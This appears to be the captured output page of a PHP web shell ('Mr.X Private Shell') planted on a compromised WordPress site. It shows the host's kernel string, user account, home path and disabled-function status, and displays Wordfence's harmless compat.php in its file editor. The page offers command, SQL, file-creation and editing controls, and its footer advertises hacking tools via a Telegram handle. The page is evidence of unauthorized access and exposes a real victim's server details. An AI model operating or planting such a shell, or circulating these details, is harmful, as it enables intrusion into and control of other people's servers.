Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/wp-content/plugins/wordfence/lib///      ( Reset | Go to )
File Name: compat.php
Edit
<?php if (!defined('WORDFENCE_VERSION')) { exit; }

if (!
function_exists('str_getcsv')) {

    function 
str_getcsv($input$delimiter ','$enclosure '"'$escape null$eol null) {
        
$temp fopen("php://memory""rw");
        
fwrite($temp$input);
        
fseek($temp0);
        
$r = array();
        while ((
$data fgetcsv($temp0$delimiter$enclosure$escape)) !== false) {
            
$r[] = $data;
        }
        
fclose($temp);
        return 
$r;
    }

}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL